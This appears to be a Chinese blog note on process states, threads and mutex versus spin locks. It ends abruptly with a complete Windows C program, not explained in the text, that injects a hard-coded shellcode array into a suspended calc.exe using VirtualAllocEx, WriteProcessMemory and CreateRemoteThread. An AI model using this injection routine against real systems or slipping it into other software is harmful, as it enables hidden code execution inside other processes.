关于进程、线程、锁、shellcode注入

什么是进程?
我们编写的代码只是一个存储在硬盘的静态文件，通过编译后就会生成二进制可执行文件，当我们运行这个可执行文件后，它会被装载到内存中，接着 CPU 会执行程序中的每一条指令，那么这个运行中的程序，就被称为「进程」。
现在我们考虑有一个会读取硬盘文件数据的程序被执行了，那么当运行到读取文件的指令时，就会去从硬盘读取数据，但是硬盘的读写速度是非常慢的，那么在这个时候，如果 CPU 傻傻的等硬盘返回数据的话，那 CPU 的利用率是非常低的。做个类比，你去煮开水时，你会傻傻的等水壶烧开吗？很明显，小孩也不会傻等。我们可以在水壶烧开之前去做其他事情。当水壶烧开了，我们自然就会听到“嘀嘀嘀”的声音，于是再把烧开的水倒入到水杯里就好了。所以，当进程要从硬盘读取数据时，CPU 不需要阻塞等待数据的返回，而是去执行另外的进程。当硬盘数据返回时，CPU 会收到个中断，于是 CPU 再继续运行这个进程。

这种多个程序、交替执行的思想，就有 CPU 管理多个进程的初步想法。
对于一个支持多进程的系统，CPU 会从一个进程快速切换至另一个进程，其间每个进程各运行几十或几百个毫秒。虽然单核的 CPU 在某一个瞬间，只能运行一个进程。但在 1 秒钟期间，它可能会运行多个进程，这样就产生并行的错觉，实际上这是并发。

进程的状态:
进程三态

上图状态的意义:
运行态:时刻进程占用CPU。
就绪态:可运行，但因为其他进程正在运行，而暂停停止。
阻塞状态:该进程等待某个事件（比如IO读取）停止运行，这时，即使给它CPU控制权，它也无法运行。
上图转换的流程:
C P U 调度绪态进程执行，进入运行状态，时间片使用完了，回到就绪态，等待 C P U 调度。
C P U 调度绪态进程执行，进入运行状态，执行IO请求，进入阻塞态，IO请求完成，CPU收到 中断 信号，进入就绪态，等待 C P U 调度。
进程五态:

NULL => 创建态（new）：一个新进程被创建时的第一个状态

创建态（new） => 就绪态（Ready）：当进程创建完成，进入就绪态

就绪态（Ready）=> 运行态（Runing）：C P U 从就绪队列选择进程执行，进入运行态

运行态（Runing）=> 结束态（Exit）：当进程已经运行完成或出错时，进入结束状

运行态（Runing） => 就绪态（Ready）：分配给进程的时间片使用完，进入就绪态

运行态（Runing） => 阻塞状态（Blocked）： 进程执行等待事件，进入阻塞态

阻塞状态（Blocked） => 就绪态（Ready）：进程事件完成，C P U 收到 中断 信号 ，进入就绪态

进程七态:
其实进程还有一种状态叫挂起态，挂起态代表该进程不会占用内存空间，它会被换出到硬盘空间保存，当需要使用它的时候，会被换入，加载到内存，挂起态可以分为下面两种。
阻塞挂起状态：进程在外存（硬盘）并等待某个事件的出现。
就绪挂起状态：进程在外存（硬盘），但只要进入内存，即刻立刻运行。

什么是线程
在早期操作系统都是以 进程 为独立运行的基本单位，直到后面，计算机科学家又提出了更小的能独立运行的基本单位，它就是线程。在现代操作系统，进程是最小的资源分配单位，线程是最小的运行单位，一个进程下面能有一个或多个线程，每个线程都有独立一套的寄存器和栈，这样可以确保线程的控制流是相对独立的。

一个进程中可以同时存在多个线程
让进程具备多任务并行处理能力同进程下的各个线程之间可以共享进程资源
（同进程内的多线程通信十分简单高效）更轻量与高效
线程的缺点:
因为进程资源共享，所以会产生资源竞争，需要通过锁机制来协同
当进程中的一个线程奔溃时，会导致其所属进程的所有线程奔溃（一般游戏的用户设计不会采用多线程方式）

进程是最小的资源（包括内存、打开的文件等）分配单位，线程是最小的运行单位
进程拥有一个完整的资源平台，而线程只独享必不可少的资源，如寄存器和栈线程同样具有就绪、阻塞、执行三种基本状态，同样具有状态之间的转换关系（和进程大同小异）线程的创建、终止时间比进程快，因为进程在创建的过程中，还需要资源管理信息，比如内存管理信息、文件管理信息，所以线程在创建的过程中，不会涉及这些资源管理信息，而是共享它们（线程管理的资源较少）同一个进程内的线程切换比进程切换快，因为线程具有相同的地址空间（虚拟内存共享），这意味着同一个进程的线程都具有同一个页表，那么在切换的时候不需要切换页表。而对于进程之间的切换，切换的时候要把页表给切换掉，而页表的切换过程开销是比较大的由于同一进程的各线程间共享内存和文件资源，那么在线程之间数据传递的时候，就不需要经过内核了，这就使得线程之间的数据交互效率更高了

关于"锁"的概念
多线程访问共享资源的时候，避免不了资源竞争而导致数据错乱的问题，所以我们通常为了解决这一问题，都会在访问共享资源之前加锁。

1.互斥锁加锁失败后，线程会释放 CPU ，给其他线程；
2.自旋锁加锁失败后，线程会忙等待，直到它拿到锁；

加锁的目的就是保证共享资源在任意时间里，只有一个线程访问，这样就可以避免多线程导致共享数据错乱的问题。
当已经有一个线程加锁后，其他线程加锁则就会失败，互斥锁和自旋锁对于加锁失败后的处理方式是不一样的。
互斥锁是一种「独占锁」，比如当线程 A 加锁成功后，此时互斥锁已经被线程 A 独占了，只要线程 A 没有释放手中的锁，线程 B 加锁就会失败，于是就会释放 CPU 让给其他线程，既然线程 B 释放掉了 CPU，自然线程 B 加锁的代码就会被阻塞。
对于互斥锁加锁失败而阻塞的现象，是由操作系统内核实现的。当加锁失败时，内核会将线程置为「睡眠」状态，等到锁被释放后，内核会在合适的时机唤醒线程，当这个线程成功获取到锁后，于是就可以继续执行。
所以，互斥锁加锁失败时，会从用户态陷入到内核态，让内核帮我们切换线程，虽然简化了使用锁的难度，但是存在一定的性能开销成本。
那这个开销成本是什么呢？会有两次线程上下文切换的成本：
当线程加锁失败时，内核会把线程的状态从「运行」状态设置为「睡眠」状态，然后把 CPU 切换给其他线程运行；
接着，当锁被释放时，之前「睡眠」状态的线程会变为「就绪」状态，然后内核会在合适的时间，把 CPU 切换给该线程运行

而自旋锁当发生多线程竞争锁的情况，加锁失败的线程会「忙等待」，直到它拿到锁，也就是他永远不会放弃CPU。

使用自旋锁的时候，当发生多线程竞争锁的情况，加锁失败的线程会「忙等待」，直到它拿到锁。这里的「忙等待」可以用 while 循环等待实现，不过最好是使用 CPU 提供的 PAUSE 指令来实现「忙等待」，因为可以减少循环等待时的耗电量。

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
 
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
		"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
		"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
		"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
		"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
		"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
		"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
		"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
 
 
BOOL injection()
{
	wchar_t Cappname[MAX_PATH] = {0};
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID lpMalwareBaseAddr;
	LPVOID lpnewVictimBaseAddr;
	HANDLE hThread;
	DWORD dwExitCode;
	BOOL bRet = FALSE;
 
	lpMalwareBaseAddr = shellcode;
 
	//获取计算器的地址，接下来将启动一个计算器
	GetSystemDirectory(Cappname,MAX_PATH);
	_tcscat(Cappname,L"\\calc.exe");
	printf("Injection program Name:%S\r\n",Cappname);
 
	ZeroMemory(&si,sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi,sizeof(pi));
 
	//创建计算器
	if (CreateProcess(Cappname,NULL,NULL,NULL,
		FALSE,CREATE_SUSPENDED
		,NULL,NULL,&si,&pi) == 0)
	{
		return bRet;
	}
 
	//开辟内存空间大小
	lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
		,NULL,sizeof(shellcode)+1,MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);
 
	if (lpnewVictimBaseAddr == NULL)
	{
		return bRet;
	}
 
	//将SHELLCODE写入
	WriteProcessMemory(pi.hProcess,lpnewVictimBaseAddr,
		(LPVOID)lpMalwareBaseAddr,sizeof(shellcode)+1,NULL);
 
	//创建线程
	hThread = CreateRemoteThread(pi.hProcess,0,0,
		(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr,NULL,0,NULL);
 
	//等待结束进程
	WaitForSingleObject(pi.hThread,INFINITE);
	GetExitCodeProcess(pi.hProcess,&dwExitCode);
	TerminateProcess(pi.hProcess,0);
	return bRet;
}
 
void help(char* proc)
{
	printf("%s:[-] start a process and injection shellcode to memory\r\n",proc);
}
 
int main(int argc,char* argv[])
{
	help(argv[0]);
	injection();
}

远程shellcode注入